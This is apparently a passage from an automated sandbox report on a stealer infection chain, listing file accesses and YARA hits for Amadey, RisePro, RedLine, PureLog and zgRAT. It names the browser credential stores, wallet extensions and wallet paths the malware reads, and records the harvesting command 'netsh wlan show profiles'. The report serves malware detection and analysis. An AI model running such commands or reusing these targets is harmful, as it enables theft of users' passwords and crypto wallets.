                                Source: C:\ProgramData\MPGPH131\MPGPH131.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
                                Source: C:\ProgramData\MPGPH131\MPGPH131.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
                                Source: C:\ProgramData\MPGPH131\MPGPH131.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
                                Source: C:\ProgramData\MPGPH131\MPGPH131.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
                                Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exeQueries volume information: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1000012001\amert.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1000012001\amert.exe VolumeInformationJump to behavior
                                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
                                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformationJump to behavior
                                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
                                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
                                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                Source: C:\ProgramData\MPGPH131\MPGPH131.exeQueries volume information: C:\ VolumeInformation
                                Source: C:\ProgramData\MPGPH131\MPGPH131.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite VolumeInformation
                                Source: C:\ProgramData\MPGPH131\MPGPH131.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies VolumeInformation
                                Source: C:\ProgramData\MPGPH131\MPGPH131.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History VolumeInformation
                                Source: C:\ProgramData\MPGPH131\MPGPH131.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Web Data VolumeInformation
                                Source: C:\ProgramData\MPGPH131\MPGPH131.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies VolumeInformation
                                Source: C:\ProgramData\MPGPH131\MPGPH131.exeQueries volume information: C:\ VolumeInformation
                                Source: C:\ProgramData\MPGPH131\MPGPH131.exeQueries volume information: C:\ VolumeInformation
                                Source: C:\ProgramData\MPGPH131\MPGPH131.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies VolumeInformation
                                Source: C:\ProgramData\MPGPH131\MPGPH131.exeQueries volume information: C:\ VolumeInformation
                                Source: C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exeQueries volume information: C:\ VolumeInformation
                                Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeQueries volume information: C:\ VolumeInformation
                                Source: C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exeQueries volume information: C:\ VolumeInformation
                                Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeQueries volume information: C:\ VolumeInformation
                                Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exeQueries volume information: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe VolumeInformation
                                Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1000147001\swiiiii.exe VolumeInformation
                                Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1000147001\swiiiii.exe VolumeInformation
                                Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exeQueries volume information: C:\Users\user\AppData\Roaming\c1ec479e5342a2\cred64.dll VolumeInformation
                                Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exeQueries volume information: C:\Users\user\AppData\Roaming\c1ec479e5342a2\cred64.dll VolumeInformation
                                Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exeQueries volume information: C:\Users\user\AppData\Roaming\c1ec479e5342a2\clip64.dll VolumeInformation
                                Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exeQueries volume information: C:\Users\user\AppData\Roaming\c1ec479e5342a2\clip64.dll VolumeInformation
                                Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1000148001\alexxxxxxxx.exe VolumeInformation
                                Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1000148001\alexxxxxxxx.exe VolumeInformation
                                Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1000149001\gold.exe VolumeInformation
                                Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1000149001\gold.exe VolumeInformation
                                Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1000150001\NewB.exe VolumeInformation
                                Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1000150001\NewB.exe VolumeInformation
                                Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1000152001\jok.exe VolumeInformation
                                Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1000152001\jok.exe VolumeInformation
                                Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1000153001\swiiii.exe VolumeInformation
                                Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1000153001\swiiii.exe VolumeInformation
                                Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1000181001\file300un.exe VolumeInformation
                                Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1000181001\file300un.exe VolumeInformation
                                Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1000208001\install.exe VolumeInformation
                                Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1000208001\install.exe VolumeInformation
                                Source: C:\Users\user\AppData\Local\Temp\1000147001\swiiiii.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1000147001\swiiiii.exe VolumeInformation
                                Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Users\user\Desktop\BNAGMGSPLO.docx VolumeInformation
                                Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Users\user\Desktop\EEGWXUHVUG.docx VolumeInformation
                                Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Users\user\Desktop\GRXZDKKVDB.xlsx VolumeInformation
                                Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Users\user\Desktop\NVWZAPQSQL.docx VolumeInformation
                                Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Users\user\Desktop\NVWZAPQSQL.xlsx VolumeInformation
                                Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Users\user\Desktop\PALRGUCVEH.xlsx VolumeInformation
                                Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Users\user\Desktop\SQSJKEBWDT.docx VolumeInformation
                                Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Users\user\Desktop\SQSJKEBWDT.xlsx VolumeInformation
                                Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip VolumeInformation
                                Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip VolumeInformation
                                Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip VolumeInformation
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\ VolumeInformation
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\ VolumeInformation
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\ VolumeInformation
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\ VolumeInformation
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\ VolumeInformation
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\ VolumeInformation
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\ VolumeInformation
                                Source: C:\Windows\System32\netsh.exeQueries volume information: C:\ VolumeInformation
                                Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exeCode function: 2_2_005AC3CA GetSystemTimePreciseAsFileTime,GetSystemTimePreciseAsFileTime,2_2_005AC3CA
                                Source: C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exeCode function: 4_2_0012D27A GetUserNameW,4_2_0012D27A
                                Source: C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exeCode function: 4_2_0010B952 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,4_2_0010B952
                                Source: C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exeCode function: 4_2_000D42DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,4_2_000D42DE
                                Source: C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                                Lowering of HIPS / PFW / Operating System Security Settings

                                barindex
                                Uses netsh to modify the Windows network and firewall settings
                                Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profiles
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

                                Stealing of Sensitive Information

                                barindex
                                Yara detected Amadeys Clipper DLL
                                Source: Yara matchFile source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\clip64[1].dll, type: DROPPED
                                Source: Yara matchFile source: C:\Users\user\AppData\Roaming\c1ec479e5342a2\clip64.dll, type: DROPPED
                                Yara detected Amadeys stealer DLL
                                Source: Yara matchFile source: 37.2.chrosha.exe.a00000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 44.2.chrosha.exe.a00000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 2.2.explorta.exe.590000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 26.2.amert.exe.860000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 3.2.explorta.exe.590000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 45.2.explorta.exe.590000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 0.2.file.exe.b40000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 0000002C.00000003.2631909972.0000000004CD0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000000.00000003.1986544625.0000000005350000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000002D.00000002.2674415512.0000000000591000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000003.00000003.2026683858.0000000005140000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000002D.00000003.2633330881.0000000004D90000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000002.00000002.3250378397.0000000000591000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000002C.00000002.3263497208.0000000000A01000.00000040.00000001.01000000.00000011.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000000.00000002.2026672887.0000000000B41000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000002.00000003.2019740253.0000000005110000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000001A.00000002.2451043145.0000000000861000.00000040.00000001.01000000.0000000E.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000025.00000003.2448505563.0000000004E10000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000003.00000002.2067162566.0000000000591000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000025.00000002.2489688651.0000000000A01000.00000040.00000001.01000000.00000011.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000001A.00000003.2360399183.0000000005010000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\clip64[1].dll, type: DROPPED
                                Source: Yara matchFile source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\NewB[1].exe, type: DROPPED
                                Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\1000150001\NewB.exe, type: DROPPED
                                Source: Yara matchFile source: C:\Users\user\AppData\Roaming\c1ec479e5342a2\cred64.dll, type: DROPPED
                                Source: Yara matchFile source: C:\Users\user\AppData\Roaming\c1ec479e5342a2\clip64.dll, type: DROPPED
                                Source: Yara matchFile source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\cred64[1].dll, type: DROPPED
                                Yara detected PureLog Stealer
                                Source: Yara matchFile source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\alexxxxxxxx[1].exe, type: DROPPED
                                Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\1000148001\alexxxxxxxx.exe, type: DROPPED
                                Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\iolo\dm\BIT1659.tmp, type: DROPPED
                                Yara detected RedLine Stealer
                                Source: Yara matchFile source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\jok[1].exe, type: DROPPED
                                Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\1000152001\jok.exe, type: DROPPED
                                Yara detected RisePro Stealer
                                Source: Yara matchFile source: 00000008.00000002.2516925001.0000000007BDD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000014.00000003.2363329164.0000000007A11000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000008.00000002.2511321549.000000000149E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000014.00000002.2539684694.0000000007A11000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000014.00000003.2362400081.0000000007A11000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000014.00000002.2539684694.00000000079D0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000014.00000003.2361500183.0000000007A11000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: Process Memory Space: 2531414c80.exe PID: 7556, type: MEMORYSTR
                                Source: Yara matchFile source: Process Memory Space: MPGPH131.exe PID: 6188, type: MEMORYSTR
                                Source: Yara matchFile source: Process Memory Space: MPGPH131.exe PID: 2584, type: MEMORYSTR
                                Source: Yara matchFile source: Process Memory Space: 2531414c80.exe PID: 8848, type: MEMORYSTR
                                Source: Yara matchFile source: Process Memory Space: RageMP131.exe PID: 11696, type: MEMORYSTR
                                Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\cgrqKzIZDKj22M18G57j8co.zip, type: DROPPED
                                Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\M5gQOMOo3fGmoJBomt4v2FX.zip, type: DROPPED
                                Yara detected zgRAT
                                Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\iolo\dm\BIT1659.tmp, type: DROPPED
                                Found many strings related to Crypto-Wallets (likely being stolen)
                                Source: 2531414c80.exe, 00000008.00000002.2511321549.0000000001538000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: C:\Users\user\AppData\Roaming\Electrum\wallets
                                Source: 2531414c80.exe, 00000008.00000002.2511321549.0000000001538000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \??\C:\Users\user\AppData\Roaming\ElectronCash\walletsn3<
                                Source: 2531414c80.exe, 00000008.00000002.2511321549.0000000001538000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: C:\Users\user\AppData\Roaming\Jaxx\Local Storage
                                Source: 2531414c80.exe, 00000008.00000002.2511321549.0000000001538000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
                                Source: 2531414c80.exe, 00000008.00000002.2511321549.00000000014F9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: C:\Users\user\AppData\Roaming\Ethereum\wallets
                                Source: 2531414c80.exe, 00000008.00000002.2511321549.0000000001538000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
                                Source: 2531414c80.exe, 00000008.00000002.2511321549.0000000001538000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \??\C:\Users\user\AppData\Roaming\Binance\app-store.jsonC
                                Source: 2531414c80.exe, 00000008.00000002.2511321549.00000000014F9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: C:\Users\user\AppData\Roaming\Ethereum\wallets
                                Source: 2531414c80.exe, 00000008.00000002.2511321549.0000000001538000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
                                Source: 2531414c80.exe, 00000008.00000002.2511321549.0000000001538000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: C:\Users\user\AppData\Roaming\MultiDoge\multidoge.wallet
                                Source: 2531414c80.exe, 00000008.00000002.2516925001.0000000007BDD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \??\C:\Users\user\AppData\Roaming\Ledger Live
                                Source: MPGPH131.exe, 00000013.00000002.2507231203.0000000008422000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\*I#
                                Tries to harvest and steal WLAN passwords
                                Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profiles
                                Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profiles
                                Tries to harvest and steal browser information (history, passwords, etc)
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\yiaxs5ej.default\key4.db
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cert9.db
                                Source: C:\ProgramData\MPGPH131\MPGPH131.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn\CURRENT
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj
                                Source: C:\ProgramData\MPGPH131\MPGPH131.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai\CURRENT
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                                Source: C:\ProgramData\MPGPH131\MPGPH131.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai\CURRENT
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo
                                Source: C:\ProgramData\MPGPH131\MPGPH131.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi\CURRENT
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite
                                Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\logins.json
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                                Source: C:\ProgramData\MPGPH131\MPGPH131.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn\CURRENT
                                Source: C:\ProgramData\MPGPH131\MPGPH131.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig\CURRENT
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad
